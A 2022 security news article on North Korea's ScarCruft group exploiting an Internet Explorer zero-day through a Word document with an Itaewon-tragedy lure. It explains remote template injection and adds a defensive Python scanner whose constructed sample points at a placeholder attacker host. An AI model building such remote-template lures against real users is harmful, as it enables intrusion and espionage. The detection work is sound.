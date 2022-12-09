Microsoft ended support for Internet Explorer 11 on June 15, 2022. Continuing to use it anyway (many companies do, keeping obsolete software alive alongside Windows 7 and, in the worst cases, Windows XP) means accepting considerable security risk.

An Internet Explorer zero-day vulnerability has been actively exploited by a North Korean actor to target South Korean users, using the recent Itaewon Halloween crowd crush as a lure to trick victims into downloading malware.

The discovery, reported by Google Threat Analysis Group (TAG) researchers Benoît Sevens and Clément Lecigne, is the latest in a series of attacks attributed to the ScarCruft group, also tracked as APT37, InkySquid, Reaper and Ricochet Chollima.

“Over time, the group has focused its efforts on South Korean users, North Korean defectors, policy makers, journalists, and human rights activists,” TAG stated in an analysis published on Thursday.

How does this vulnerability in the now-deprecated Internet Explorer work?

The new findings show the group's continued abuse of Internet Explorer flaws such as CVE-2020-1380 and CVE-2021-26411 to deploy backdoors known as BLUELIGHT and Dolphin; the latter was documented by Slovak cybersecurity firm ESET late last month.

Another key tool in its arsenal is RokRat, a Windows-based remote access trojan with a wide range of capabilities, including taking screenshots, logging keystrokes, and even gathering information about nearby Bluetooth devices.

The attacks observed by Google TAG involve a malicious Microsoft Word document that was uploaded to VirusTotal on October 31, 2022. It abuses another Internet Explorer zero-day, CVE-2022-41128, a vulnerability in the JScript9 JavaScript engine that Microsoft patched last month.

The file references the October 29 incident in Seoul's Itaewon neighborhood and exploits public interest in the tragedy so that users unknowingly trigger the exploit simply by opening it. The attack works because the document pulls a remote rich text file (RTF) template, which in turn fetches remote HTML content that Office renders with the Internet Explorer engine. This is why the victim does not need to use Internet Explorer as their default browser: Office uses the IE engine for this HTML regardless of what the user browses with.

As MalwareHunterTeam pointed out, the same Word file had previously been shared by the Shadow Chaser Group on October 31, 2022, which described it as an “interesting DOCX injection template sample” originating from Korea.

Successful exploitation is followed by shellcode that covers its tracks by clearing Internet Explorer's cache and history, then downloads the next-stage payload.

Google TAG said it was unable to recover the follow-on malware used in the campaign, although it suspects the chain ended in the deployment of RokRat, BLUELIGHT or Dolphin.
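To make the “DOCX injection template” step above concrete, here is an added detection script, written for this article and not code from Google TAG, ESET or the attackers. A .docx is a zip archive; the lure document itself contains no exploit, it only carries a relationship in word/_rels/settings.xml.rels that points Word at a template URL, so the malicious content is fetched at open time. The script opens the archive and reports any attached-template relationship whose target is an http(s) URL or UNC path. The sample documents it builds are constructed in memory, and the hostname template.attacker.example is a placeholder, not an indicator from this campaign.

```python
"""Flag .docx files that pull a remote template when opened (template injection).

Added example for this article; not tooling from Google TAG or the campaign.
"""
import io
import sys
import xml.etree.ElementTree as ET
import zipfile

# Relationship type Word uses for the template attached to a document.
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/"
    "relationships/attachedTemplate"
)
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def remote_template_targets(docx_bytes):
    """Return attachedTemplate targets that make Word reach over the network.

    Caveat: a legitimate document attached to a local Normal.dotm is ALSO
    written with TargetMode="External" and a file:/// URI, so TargetMode on
    its own is not a signal. The scheme of the target is: http(s) URLs and
    UNC paths (\\\\host\\share) are the ones fetched from a remote host.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return hits  # document declares no template relationships at all
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            if rel.get("TargetMode") != "External":
                continue
            target = rel.get("Target", "")
            if target.lower().startswith(("http://", "https://")) or target.startswith("\\\\"):
                hits.append(target)
    return hits


def build_docx(template_rel_xml):
    """Build a minimal .docx in memory (constructed sample, not a real lure)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">{template_rel_xml}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


# Constructed relationships. The hostname is a placeholder, not a campaign IOC.
INJECTED_REL = (
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="http://template.attacker.example/lure.dotm" TargetMode="External"/>'
)
# What a normal, locally attached template looks like: also "External".
LOCAL_REL = (
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" '
    'TargetMode="External"/>'
)


def scan_file(path):
    """Scan a .docx on disk and return its remote template targets."""
    with open(path, "rb") as fh:
        return remote_template_targets(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            for url in scan_file(p):
                print(f"{p}: remote template -> {url}")
    else:
        print("injected:", remote_template_targets(build_docx(INJECTED_REL)))
        print("local:   ", remote_template_targets(build_docx(LOCAL_REL)))
```

Run it with one or more .docx paths as arguments, or with none to see the constructed positive and negative samples. The check only tells you that the file reaches out for its template; it says nothing about whether the server answers with RTF, HTML or an exploit, so a hit is a triage signal, not a verdict.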

Why don’t many people upgrade?

Unfortunately, all over the world (not only in Italy), there is a habit of not reading the announcements of the vendor (Microsoft in the case of Windows 7, Internet Explorer, etc.), because it is taken for granted that “once we've learned how things work, we're good to go.”

Windows updates were not invented because the developers woke up one day and decided to invent them; there are cyber security reasons behind them. Each security update closes vulnerabilities that, once the patch is public, attackers can study and turn against anyone who has not installed it.

It might seem that if you don't live in South Korea and have no dealings with the country over the Internet, you have nothing to fear from this campaign. That is true only of the lure: the vulnerable component is the same Internet Explorer engine that ships with every Windows installation and that Office uses to render HTML, regardless of the user's language or default browser. Anyone on an unpatched system could be hit with the same exploit behind a different decoy.

The fact is that the end of life of software (such as Internet Explorer) or operating systems (Windows 7, XP, etc.) is not something to be taken lightly with a “well, I'll keep using it, what could possibly happen?” Unpatched flaws accumulate and grow over time, like a ship taking on water without the captain realizing it.